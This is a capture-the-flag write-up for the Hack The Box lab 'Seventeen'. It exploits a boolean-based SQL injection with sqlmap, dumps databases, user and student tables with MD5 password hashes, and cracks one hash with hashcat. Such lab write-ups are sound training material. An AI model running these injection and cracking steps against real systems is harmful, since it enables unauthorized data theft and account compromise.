Boolean Based SQL Injection
The target web application was confirmed to be vulnerable SQLi As reviewed previously, performing a manual Boolean based SQL injection would be extremely time consuming. Therefore, I will be using sqlmap for convenience
Current User
┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --batch --technique B --current-user
[...REDACTED...]
[22:38:24] [INFO] fetching current user
[22:38:24] [INFO] retrieved: mysqluser@%
current user: 'mysqluser@%'
[...REDACTED...]The current user appears to be the default, mysqluser@%
DBs
┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --batch --technique B --dbs --current-db
[...REDACTED...]
[22:39:37] [INFO] fetching current database
[22:39:37] [INFO] resumed: erms_db
current database: 'erms_db'
[22:39:37] [INFO] fetching database names
[22:39:37] [INFO] fetching number of databases
[22:39:37] [INFO] resumed: 4
[22:39:37] [INFO] resumed: information_schema
[22:39:37] [INFO] resumed: db_sfms
[22:39:37] [INFO] resumed: erms_db
[22:39:37] [INFO] resumed: roundcubedb
available databases [4]:
[*] db_sfms
[*] erms_db
[*] information_schema
[*] roundcubedb
[...REDACTED...]There are 4 DBs
db_sfmserms_dbinformation_schemaroundcubedb
While the information_schema DB is the default and the erms_db DB is expected, db_sfms and roundcubedb are not expected at all.
roundcubedb is the default db used for roundcube mail client whereas db_sfms seems to be used in Student File Management System. Another web application similar to the target web application
The erms_db DB is the current DB to the Exam Reviewer Management System application
erms_db
┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --batch --technique B --tables -D erms_db
[...REDACTED...]
Database: erms_db
[6 tables]
+---------------+
| category_list |
| exam_list |
| option_list |
| question_list |
| system_info |
| users |
+---------------+
[...REDACTED...]There are 6 tables within the erms_db DB
The earms_db.users table appears to be most promising
erms_db.users
┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --threads 8 --batch --technique B -T users --dump
[...REDACTED...]
database: erms_db
table: users
[3 entries]
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
| id | type | avatar | lastname | password | username | firstname | date_added | last_login | date_updated |
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
| 1 | 1 | ../oldmanagement/files/avatar.png | admin | fc8ec7b43523e186a27f46957818391c | admin | adminstrator | 2021-01-20 14:02:37 | NULL | 2022-02-24 22:00:15 |
| 6 | 2 | ../oldmanagement/files/avatar.png | anthony | 48bb86d036bb993dfdcf7fefdc60cc06 | undetectablemark | mark | 2021-09-30 16:34:02 | NULL | 2022-05-10 08:21:39 |
| 7 | 2 | ../oldmanagement/files/avatar.png | smith | 184fe92824bea12486ae9a56050228ee | stev1992 | steven | 2022-02-22 21:05:07 | NULL | 2022-02-24 22:00:24 |
+----+------+-----------------------------------+----------+----------------------------------+------------------+--------------+---------------------+------------+---------------------+
[...REDACTED...]Dumping the earms_db.users table
User credentials are retrieved with password hashes
admin:fc8ec7b43523e186a27f46957818391cundetectablemark:48bb86d036bb993dfdcf7fefdc60cc06stev1992:184fe92824bea12486ae9a56050228eeI am unable to crack the password hashes Additionally, Admin Login was not available
erms_db.system_info
┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --threads 8 --batch --technique B -T system_info --dump
[...REDACTED...]
Database: erms_db
Table: system_info
[5 entries]
+----+-------------+-------------------------------------------+
| id | meta_field | meta_value |
+----+-------------+-------------------------------------------+
| 1 | name | Seventeen Exam Reviewer Management System |
| 6 | short_name | Examination Management System |
| 11 | logo | uploads/l.jpg |
| 13 | user_avatar | uploads/user_avatar.jpg |
| 14 | cover | uploads/1644023580_wallpaper.jpg |
+----+-------------+-------------------------------------------+
[...REDACTED...]db_sfms
As mentioned earlier above, presence of the db_sfms DB suggests that there is an instance running.
┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --threads 8 --batch --technique B -D db_sfms --tables
[...REDACTED...]
database: db_sfms
[3 tables]
+---------+
| user |
| storage |
| student |
+---------+
[...REDACTED...]There are 3 tables within the db_sfms DB
db_sfms.user
┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --threads 8 --batch --technique B -D db_sfms -T user --dump
[...REDACTED...]
Database: db_sfms
Table: user
[3 entries]
+---------+---------------+---------------+----------------------------------+------------------+---------------+
| user_id | status | lastname | password | username | firstname |
+---------+---------------+---------------+----------------------------------+------------------+---------------+
| 1 | administrator | Administrator | fc8ec7b43523e186a27f46957818391c | admin | Administrator |
| 2 | Regular | Anthony | b35e311c80075c4916935cbbbd770cef | UndetectableMark | Mark |
| 4 | Regular | Smith | 112dd9d08abf9dcceec8bc6d3e26b138 | Stev1992 | Steven |
+---------+---------------+---------------+----------------------------------+------------------+---------------+
[...REDACTED...]The db_sfms.user table contains the same usernames from the erms_db.users table earlier
But there are some difference in the password hashes
admin:fc8ec7b43523e186a27f46957818391cUndetectableMark:b35e311c80075c4916935cbbbd770cefStev1992:112dd9d08abf9dcceec8bc6d3e26b138
Nevertheless, these hashes are not crackable
db_sfms.storage
┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --threads 8 --batch --technique B -D db_sfms -T storage --dump
[...REDACTED...]
database: db_sfms
table: storage
[1 entry]
+----------+---------+----------------------+-----------------+----------------------+
| store_id | stud_no | filename | file_type | date_uploaded |
+----------+---------+----------------------+-----------------+----------------------+
| 33 | 31234 | marksheet-finals.pdf | application/pdf | 2020-01-26, 06:57 PM |
+----------+---------+----------------------+-----------------+----------------------+
[...REDACTED...]The db_sfms.storage tables contains a single PDF file
db_sfms.student
┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --threads 8 --batch --technique B -D db_sfms -T student --dump
[...REDACTED...]
Database: db_sfms
Table: student
[4 entries]
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
| stud_id | yr | gender | stud_no | lastname | password | firstname |
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
| 1 | 1A | Male | 12345 | Smith | 1a40620f9a4ed6cb8d81a1d365559233 | John |
| 2 | 2B | Male | 23347 | Mille | abb635c915b0cc296e071e8d76e9060c | James |
| 3 | 2C | Female | 31234 | Shane | a2afa567b1efdb42d8966353337d9024 (autodestruction) | Kelly |
| 4 | 3C | Female | 43347 | Hales | a1428092eb55781de5eb4fd5e2ceb835 | Jamie |
+---------+----+--------+---------+----------+----------------------------------------------------+-----------+
[...REDACTED...]The db_sfms.student table contains credentials of the enrolled students
Those names match the student present in the testimonials earlier.
student 31234 has an interesting string in the password field; (autodestruction)
Password Cracking
┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ hashcat -a 0 -m 0 hashes.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
hashes: 10 digests; 10 unique digests, 1 unique salts
bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
rules: 1
dictionary cache hit:
* filename..: /usr/share/wordlists/rockyou.txt
* passwords.: 14344385
* bytes.....: 139921507
* keyspace..: 14344385
a2afa567b1efdb42d8966353337d9024:autodestruction
session..........: hashcat
status...........: Exhausted
hash.mode........: 0 (MD5)
hash.target......: hashes.txt
time.started.....: Tue Jun 20 01:02:04 2023 (5 secs)
time.estimated...: Tue Jun 20 01:02:09 2023 (0 secs)
kernel.feature...: Pure Kernel
guess.base.......: File (/usr/share/wordlists/rockyou.txt)
guess.queue......: 1/1 (100.00%)
speed.#1.........: 3216.5 kH/s (0.22ms) @ Accel:512 Loops:1 Thr:1 Vec:8
recovered........: 1/10 (10.00%) Digests (total), 1/10 (10.00%) Digests (new)
progress.........: 14344385/14344385 (100.00%)
rejected.........: 0/14344385 (0.00%)
restore.point....: 14344385/14344385 (100.00%)
restore.sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
candidate.engine.: Device Generator
candidates.#1....: $HEX[212173657879616e67656c2121] -> $HEX[042a0337c2a156616d6f732103]
hardware.mon.#1..: Util: 28%
Password hash cracked for student 31234; autodestruction
roundcubedb
┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --threads 8 --batch --technique B -D roundcubedb --tables
[...REDACTED...]
Database: roundcubedb
[14 tables]
+---------------------+
| session |
| system |
| cache |
| cache_index |
| cache_messages |
| cache_shared |
| cache_thread |
| contactgroupmembers |
| contactgroups |
| contacts |
| dictionary |
| identities |
| searches |
| users |
+---------------------+
[...REDACTED...]While there are 14 tables, the roundcubedb.users tables appears most valuable
The presence of roundcubedb DB also indicates that there is an instance running somewhere.
roundcubedb.users
┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --threads 8 --batch --technique B -D roundcubedb -T users --dump
[...REDACTED...]
database: roundcubedb
table: users
[1 entry]
+---------+---------------------+------------+-----------+------------+---------------------+-------------------------------------------------------------------+---------------------+----------------------+
| user_id | created | username | mail_host | language | last_login | preferences | failed_login | failed_login_counter |
+---------+---------------------+------------+-----------+------------+---------------------+-------------------------------------------------------------------+---------------------+----------------------+
| 1 | 2022-03-19 21:30:30 | smtpmailer | localhost | en_US | 2022-03-22 13:41:05 | a:1:{s:11:"client_hash";s:32:"0db936ce29d4c4d2a2f82db8b3d7870c";} | 2022-03-23 15:32:37 | 3 |
+---------+---------------------+------------+-----------+------------+---------------------+-------------------------------------------------------------------+---------------------+----------------------+
[...REDACTED...]smtpmailer:0db936ce29d4c4d2a2f82db8b3d7870c
Unable to crack the password hash
roundcubedb.system
┌──(kali㉿kali)-[~/archive/htb/labs/seventeen]
└─$ sqlmap -u 'http://exam.seventeen.htb/?p=take_exam&id=1' -p id --threads 8 --batch --technique B -D roundcubedb -T system --dump
[...REDACTED...]
Database: roundcubedb
Table: system
[1 entry]
+-------------------+------------+
| name | value |
+-------------------+------------+
| roundcube-version | 2015111100 |
+-------------------+------------+
[...REDACTED...]